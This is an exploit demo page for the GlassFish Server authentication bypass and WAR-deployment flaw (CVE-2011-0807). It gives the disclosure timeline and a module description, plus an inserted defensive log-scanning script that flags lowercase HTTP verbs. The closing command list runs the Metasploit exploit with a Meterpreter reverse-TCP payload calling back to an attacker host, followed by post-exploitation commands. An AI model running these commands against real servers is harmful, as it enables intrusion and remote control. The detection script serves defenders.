CVE-2011-0807 : Sun/Oracle GlassFish Server Authenticated Code Execution Metasploit Demo
Timeline :
Vulnerability discovered by Jason Bowes and submitted to ZDI
Initial ZDI vulnerability notification to vendor on 2010-09-23
Coordinated public release of the vulnerability on 2011-04-19
Metasploit PoC provided on 2011-08-04
PoC provided by :
juan vazquez
Joshua Abraham
sinn3r
Reference(s) :
Affected version(s) :
Sun GlassFish Enterprise Server 2.1, 2.1.1, 3.0.1
Java System Application Server 9.1
Tested on Windows XP SP3 with :
Sun GlassFish Enterprise Server 3.0.1
Description :
This module logs in to a GlassFish Server 3.1 (Open Source or Commercial) instance using a default credential, uploads a malicious WAR, and executes commands by deploying it. On GlassFish 2.x, 3.0 and Sun Java System Application Server 9.x this module will instead try to bypass authentication by sending lowercase HTTP verbs.
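The two behaviours in the description (authenticated WAR deployment, and the lowercase-verb authentication bypass on older versions) both leave traces in the server's HTTP access log. The following detection script is an added example for defenders; it is not part of the original post or of the Metasploit module. It assumes Common Log Format lines, uses a constructed sample log, and treats the /admin path prefix as an assumed stand-in for the administrative interface of whatever server is being monitored.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines in Common Log Format. They are not real
# GlassFish output; the /admin prefix is an assumed stand-in for the admin UI.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Apr/2011:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.9 - - [19/Apr/2011:10:00:07 +0000] "get /admin/ HTTP/1.1" 200 4096
10.0.0.9 - - [19/Apr/2011:10:00:09 +0000] "post /admin/deploy HTTP/1.1" 200 128
10.0.0.7 - admin [19/Apr/2011:10:01:00 +0000] "POST /admin/deploy HTTP/1.1" 200 128
10.0.0.5 - - [19/Apr/2011:10:02:00 +0000] "GET /admin/ HTTP/1.1" 401 0
"""

# Common Log Format: ip ident user [timestamp] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

ADMIN_PREFIX = "/admin"  # assumed path prefix of the administrative interface


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one CLF line into named fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def reasons_for(entry: Dict[str, str]) -> List[str]:
    """Return the list of suspicious traits found in a parsed log entry."""
    reasons: List[str] = []
    method = entry["method"]
    # HTTP method tokens are case-sensitive and the standard ones are all
    # upper-case. A token containing lower-case letters is anomalous and is
    # exactly the trait of the bypass described on the page.
    if method != method.upper():
        reasons.append("non-uppercase HTTP method")
    # A successful (2xx) request to the admin interface that the server logged
    # with no authenticated user is worth a second look on its own.
    if (entry["path"].startswith(ADMIN_PREFIX)
            and entry["user"] == "-"
            and entry["status"].startswith("2")):
        reasons.append("unauthenticated 2xx on admin interface")
    return reasons


def scan(log_text: str) -> List[Dict[str, object]]:
    """Run the checks over every line and collect findings with line numbers."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        entry = parse_line(line)
        if entry is None:
            findings.append({"line": lineno, "reasons": ["unparseable line"]})
            continue
        reasons = reasons_for(entry)
        if reasons:
            findings.append({
                "line": lineno,
                "ip": entry["ip"],
                "method": entry["method"],
                "path": entry["path"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Run against the constructed sample, the script flags only lines 2 and 3 (lowercase verbs that nevertheless got a 2xx from the admin path with no user recorded); the properly authenticated upper-case POST on line 4 and the rejected request on line 5 pass. Real logs from the affected versions may differ in layout, so the regex and the admin prefix should be adapted to the deployment before use.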
Commands :
use exploit/multi/http/glassfish_deployer
set RHOST 192.168.178.48
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
ipconfig
I recommend reading these related posts
- CVE-2010-0886 : Sun Java Web Start Plugin Command Line Argument Injection
- CVE-2010-3552 : Oracle Java Runtime New Plugin docbase Buffer Overflow
- CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo
- CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo
- CVE-2008-5353 : Sun Java Calendar Deserialization Exploit
- CVE-2013-2423 – Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo
- Java RMI Server Insecure Default Configuration Java Code Execution
- CVE-2012-2122 Oracle MySQL Authentication Bypass Password Dump Metasploit Demo
- Java Applet JMX 0day Remote Code Execution Metasploit Demo
- CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo